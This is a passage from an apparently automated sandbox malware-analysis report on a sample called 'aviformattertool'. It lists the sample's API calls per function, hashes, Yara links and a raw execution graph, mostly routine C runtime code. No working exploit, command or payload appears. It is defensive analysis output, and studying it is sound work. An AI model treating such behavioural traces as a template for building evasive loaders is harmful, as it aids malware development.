                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                                                                                          • CloseHandle.KERNEL32 ref: 004024A1
                                                                                                                                                          • SetServiceStatus.ADVAPI32(0040A0A8), ref: 004024CA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                                                                                          • String ID: JSON Nested Objects 66
                                                                                                                                                          • API String ID: 3346042915-4184186574
                                                                                                                                                          • Opcode ID: b8e2ceea582d5224d868d550000be66c6421262dea17db8a57385ad066ca7869
                                                                                                                                                          • Instruction ID: b1e04a5d4e7bd3d275470c836a5b4936d2fee142cab1bdbbff56863c8edf9318
                                                                                                                                                          • Opcode Fuzzy Hash: b8e2ceea582d5224d868d550000be66c6421262dea17db8a57385ad066ca7869
                                                                                                                                                          • Instruction Fuzzy Hash: 4921E470855348AFD2109F16EF48A16BEA9EB95755711413AE105B22B0C7BA0028CF2E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00405857 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                                          • API String ID: 2238633743-4044615076
                                                                                                                                                          • Opcode ID: 5e55bbd5d9fbbd31eb644cb3db4451ccecd799ed23d920ffe44c979ddb298174
                                                                                                                                                          • Instruction ID: 96757171791ba6acfa1a588329da0afe6fa494a71d71fef51203d82f368b70d2
                                                                                                                                                          • Opcode Fuzzy Hash: 5e55bbd5d9fbbd31eb644cb3db4451ccecd799ed23d920ffe44c979ddb298174
                                                                                                                                                          • Instruction Fuzzy Hash: 92012532600711AFCB11AFB5AD84A1B3FE8EB48750715443AFD05F2291D678D8359F6D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00405B1F Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
                                                                                                                                                          • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
                                                                                                                                                          • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$ByteCharMultiWide
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 352835431-0
                                                                                                                                                          • Opcode ID: 5ddbac4b75e33bff4f019730f37dd77ec854adadffa24fffe04afa75f44fdc89
                                                                                                                                                          • Instruction ID: 6c7c4d56f82388bc32b1a747b53f9b53fb7dea99d84d03387e69c39b219b6625
                                                                                                                                                          • Opcode Fuzzy Hash: 5ddbac4b75e33bff4f019730f37dd77ec854adadffa24fffe04afa75f44fdc89
                                                                                                                                                          • Instruction Fuzzy Hash: FD516931500609AFDF228F94CD45EAF7FB9EB48744F10412AF916B12A0D3399D61DF69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00404BF9 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
                                                                                                                                                          • WriteFile.KERNEL32(00000000), ref: 00404D43
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$HandleModuleNameWrite
                                                                                                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                          • API String ID: 3784150691-4022980321
                                                                                                                                                          • Opcode ID: 87626977ec5ba82154c16f7a1181adbf3904f853169ea05d33f0388251de275b
                                                                                                                                                          • Instruction ID: 15dac176226125f9b152d138cffbac045ff90c6308279214c289240873c3895a
                                                                                                                                                          • Opcode Fuzzy Hash: 87626977ec5ba82154c16f7a1181adbf3904f853169ea05d33f0388251de275b
                                                                                                                                                          • Instruction Fuzzy Hash: A731C5B2A012186FEF20E761DE49FDA336CEF81304F1105BBF945B61C0E6B89A548A19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00404710 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
                                                                                                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
                                                                                                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1823725401-0
                                                                                                                                                          • Opcode ID: 36565b9f5b822e68e5d6287e9a487bd93639a030c9873021641afaf6e7ba0288
                                                                                                                                                          • Instruction ID: 43c9d50b8e904b77a3a1cd3ef8b41512f2ebbfa3913c6b8dbecc9c9b9a691504
                                                                                                                                                          • Opcode Fuzzy Hash: 36565b9f5b822e68e5d6287e9a487bd93639a030c9873021641afaf6e7ba0288
                                                                                                                                                          • Instruction Fuzzy Hash: 0A3102F75442616FD7207FB99C8883BB69CE6C6358712493BFB42F3280D7798C4182A9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                                                                                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 564119183-0
                                                                                                                                                          • Opcode ID: beb4d93e6ab0000654ca0b4ef6e0369b4b44b9707bf6409794ee70763ef4fb7e
                                                                                                                                                          • Instruction ID: 463a3d7b41c8cda22d33258f608925a12b9792281116504224950c64902584c3
                                                                                                                                                          • Opcode Fuzzy Hash: beb4d93e6ab0000654ca0b4ef6e0369b4b44b9707bf6409794ee70763ef4fb7e
                                                                                                                                                          • Instruction Fuzzy Hash: 48315B31A40251AFDB109FB99E489AF7B78EF45344F10807AFE46F7291D6748941C7A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00405D6E Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
                                                                                                                                                          • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
                                                                                                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
                                                                                                                                                          • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StringType$ByteCharMultiWide
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3852931651-0
                                                                                                                                                          • Opcode ID: 9ae0dc97d2ed4bc325ef346dcbaa1dfa56a56ee49ac91c7797361c074a205c54
                                                                                                                                                          • Instruction ID: 92337b5d5261d1f7514e6591bcc0141c6486a35b2866982676c545ec12be9aca
                                                                                                                                                          • Opcode Fuzzy Hash: 9ae0dc97d2ed4bc325ef346dcbaa1dfa56a56ee49ac91c7797361c074a205c54
                                                                                                                                                          • Instruction Fuzzy Hash: B1416C72540619AFCF109FA4DD85AAF3B69EB08710F10443AF912F2290C3399A619BA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00403112 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetVersionExA.KERNEL32 ref: 00403131
                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                                                          • API String ID: 1385375860-4131005785
                                                                                                                                                          • Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                                                                                                          • Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
                                                                                                                                                          • Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                                                                                                          • Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00404842 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                                                                                                          • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                                                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                                                                                                          • SetHandleCount.KERNEL32 ref: 004049DF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileHandleType$CountInfoStartup
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1710529072-0
                                                                                                                                                          • Opcode ID: 98b932809ab249fb6d2b1e7eb3a8536e99f5defad770c06167dc9539152dd1ea
                                                                                                                                                          • Instruction ID: 8fe4441db6cd525bc9d87713bb4edde2cd7c7f14dbffc3b3aa205102a4a4cd07
                                                                                                                                                          • Opcode Fuzzy Hash: 98b932809ab249fb6d2b1e7eb3a8536e99f5defad770c06167dc9539152dd1ea
                                                                                                                                                          • Instruction Fuzzy Hash: 2B5113F26003118BD7208B38CD48B673BA0BB91320F19473AE696FB2E1D73C8855C75A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00403B08 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual$FreeHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 714016831-0
                                                                                                                                                          • Opcode ID: 6a0377e224db4ae02a06dd950b66bd3eac28a76e8822154944f4586344a6cd6a
                                                                                                                                                          • Instruction ID: 5b32f38fccd05926e46b045a885d3edb078ef3cc8d07faf24e937b41c291ab55
                                                                                                                                                          • Opcode Fuzzy Hash: 6a0377e224db4ae02a06dd950b66bd3eac28a76e8822154944f4586344a6cd6a
                                                                                                                                                          • Instruction Fuzzy Hash: A73112719447029BE3208F24DD05B22BBA8E74475AF00413AE166BB3D2E778B801874D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004056B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Info
                                                                                                                                                          • String ID: $
                                                                                                                                                          • API String ID: 1807457897-3032137957
                                                                                                                                                          • Opcode ID: 2579351cbde8a2818a07d40e767e835ce1c24e1e9af255249c9fbcd564bc5834
                                                                                                                                                          • Instruction ID: 364ad7a5ee0565adc1119f8b40c781a5b07f5a98c0ad1d73c90734a45d6efa61
                                                                                                                                                          • Opcode Fuzzy Hash: 2579351cbde8a2818a07d40e767e835ce1c24e1e9af255249c9fbcd564bc5834
                                                                                                                                                          • Instruction Fuzzy Hash: F24126314047586AEB119628DD49BFB7FA8EB02704F1404F6ED46F71D2C2794928EFAB
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040395C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocHeap$FreeVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3499195154-0
                                                                                                                                                          • Opcode ID: 5445ee1769e2b4dfc8a7df9410455d6395cf6e66bb57eb1db49a90ecc10dc223
                                                                                                                                                          • Instruction ID: a42712acd455d35c8afd215c706735e8fa7757c2ad65ecbc9136afbab992c5c7
                                                                                                                                                          • Opcode Fuzzy Hash: 5445ee1769e2b4dfc8a7df9410455d6395cf6e66bb57eb1db49a90ecc10dc223
                                                                                                                                                          • Instruction Fuzzy Hash: 59114C702003019FD7308F19EE4A9227BB9FB847617154A3AF192E71F0D7729961DF19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:10.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:84.9%
                                                                                                                                                          Signature Coverage:1.3%
                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                          Total number of Limit Nodes:32
                                                                                                                                                          execution_graph 17557 402f22 GetVersion 17581 40325a HeapCreate 17557->17581 17559 402f81 17560 402f86 17559->17560 17561 402f8e 17559->17561 17656 40303d 17560->17656 17593 404842 17561->17593 17564 402f96 GetCommandLineA 17607 404710 17564->17607 17569 402fb0 17639 40440a 17569->17639 17571 402fb5 17572 402fba GetStartupInfoA 17571->17572 17652 4043b2 17572->17652 17574 402fcc GetModuleHandleA 17576 402ff0 17574->17576 17662 404159 17576->17662 17582 4032b0 17581->17582 17583 40327a 17581->17583 17582->17559 17669 403112 17583->17669 17586 403296 17589 4032b3 17586->17589 17683 403b08 17586->17683 17587 403289 17681 4032b7 HeapAlloc 17587->17681 17589->17559 17590 403293 17590->17589 17592 4032a4 HeapDestroy 17590->17592 17592->17582 17746 402e70 17593->17746 17596 404861 GetStartupInfoA 17603 404972 17596->17603 17606 4048ad 17596->17606 17599 404999 GetStdHandle 17602 4049a7 GetFileType 17599->17602 17599->17603 17600 4049d9 SetHandleCount 17600->17564 17601 402e70 12 API calls 17601->17606 17602->17603 17603->17599 17603->17600 17604 40491e 17604->17603 17605 404940 GetFileType 17604->17605 17605->17604 17606->17601 17606->17603 17606->17604 17608 40472b GetEnvironmentStringsW 17607->17608 17609 40475e 17607->17609 17610 40473f GetEnvironmentStrings 17608->17610 17611 404733 17608->17611 17609->17611 17612 40474f 17609->17612 17610->17612 17613 402fa6 17610->17613 17614 404777 WideCharToMultiByte 17611->17614 17615 40476b GetEnvironmentStringsW 17611->17615 17612->17613 17616 4047f1 GetEnvironmentStrings 17612->17616 17617 4047fd 17612->17617 17630 4044c3 17613->17630 17619 4047ab 17614->17619 17620 4047dd FreeEnvironmentStringsW 17614->17620 17615->17613 17615->17614 17616->17613 17616->17617 17621 402e70 12 API calls 17617->17621 17622 402e70 12 API calls 17619->17622 17620->17613 17628 404818 17621->17628 17623 4047b1 17622->17623 17623->17620 17624 4047ba WideCharToMultiByte 17623->17624 17626 4047d4 17624->17626 17627 4047cb 17624->17627 17625 40482e FreeEnvironmentStringsA 17625->17613 17626->17620 17814 403061 17627->17814 17628->17625 17631 4044d5 17630->17631 17632 4044da GetModuleFileNameA 17630->17632 17844 40583b 17631->17844 17634 4044fd 17632->17634 17635 402e70 12 API calls 17634->17635 17636 40451e 17635->17636 17637 403018 7 API calls 17636->17637 17638 40452e 17636->17638 17637->17638 17638->17569 17640 404417 17639->17640 17642 40441c 17639->17642 17641 40583b 19 API calls 17640->17641 17641->17642 17643 402e70 12 API calls 17642->17643 17644 404449 17643->17644 17645 403018 7 API calls 17644->17645 17651 40445d 17644->17651 17645->17651 17646 4044a0 17647 403061 7 API calls 17646->17647 17648 4044ac 17647->17648 17648->17571 17649 402e70 12 API calls 17649->17651 17650 403018 7 API calls 17650->17651 17651->17646 17651->17649 17651->17650 17653 4043bb 17652->17653 17655 4043c0 17652->17655 17654 40583b 19 API calls 17653->17654 17654->17655 17655->17574 17657 403046 17656->17657 17658 40304b 17656->17658 17659 404bc0 7 API calls 17657->17659 17660 404bf9 7 API calls 17658->17660 17659->17658 17661 403054 ExitProcess 17660->17661 17868 40417b 17662->17868 17665 40422e 17666 40423a 17665->17666 17692 402d50 17669->17692 17672 403155 GetEnvironmentVariableA 17674 403232 17672->17674 17677 403174 17672->17677 17673 40313b 17673->17672 17675 40314d 17673->17675 17674->17675 17697 4030e5 GetModuleHandleA 17674->17697 17675->17586 17675->17587 17678 4031b9 GetModuleFileNameA 17677->17678 17679 4031b1 17677->17679 17678->17679 17679->17674 17694 404d4c 17679->17694 17682 4032d3 17681->17682 17682->17590 17684 403b15 17683->17684 17685 403b1c HeapAlloc 17683->17685 17686 403b39 VirtualAlloc 17684->17686 17685->17686 17691 403b71 17685->17691 17687 403b59 VirtualAlloc 17686->17687 17688 403c2e 17686->17688 17689 403c20 VirtualFree 17687->17689 17687->17691 17690 403c36 HeapFree 17688->17690 17688->17691 17689->17688 17690->17691 17691->17590 17693 402d5c GetVersionExA 17692->17693 17693->17672 17693->17673 17699 404d63 17694->17699 17698 4030fc 17697->17698 17698->17675 17701 404d7b 17699->17701 17703 404dab 17701->17703 17706 405aaa 17701->17706 17702 405aaa 6 API calls 17702->17703 17703->17702 17705 404d5f 17703->17705 17710 4059de 17703->17710 17705->17674 17707 405ac8 17706->17707 17709 405abc 17706->17709 17716 405d6e 17707->17716 17709->17701 17711 405a09 17710->17711 17712 4059ec 17710->17712 17713 405a25 17711->17713 17714 405aaa 6 API calls 17711->17714 17712->17703 17713->17712 17728 405b1f 17713->17728 17714->17713 17717 405db7 17716->17717 17718 405d9f GetStringTypeW 17716->17718 17720 405de2 GetStringTypeA 17717->17720 17723 405e06 17717->17723 17718->17717 17719 405dbb GetStringTypeA 17718->17719 17719->17717 17721 405ea3 17719->17721 17720->17721 17721->17709 17723->17721 17724 405e1c MultiByteToWideChar 17723->17724 17724->17721 17725 405e40 17724->17725 17725->17721 17726 405e7a MultiByteToWideChar 17725->17726 17726->17721 17727 405e93 GetStringTypeW 17726->17727 17727->17721 17729 405b6b 17728->17729 17730 405b4f LCMapStringW 17728->17730 17733 405bd1 17729->17733 17734 405bb4 LCMapStringA 17729->17734 17730->17729 17731 405b73 LCMapStringA 17730->17731 17731->17729 17732 405cad 17731->17732 17732->17712 17733->17732 17735 405be7 MultiByteToWideChar 17733->17735 17734->17732 17735->17732 17736 405c11 17735->17736 17736->17732 17737 405c47 MultiByteToWideChar 17736->17737 17737->17732 17738 405c60 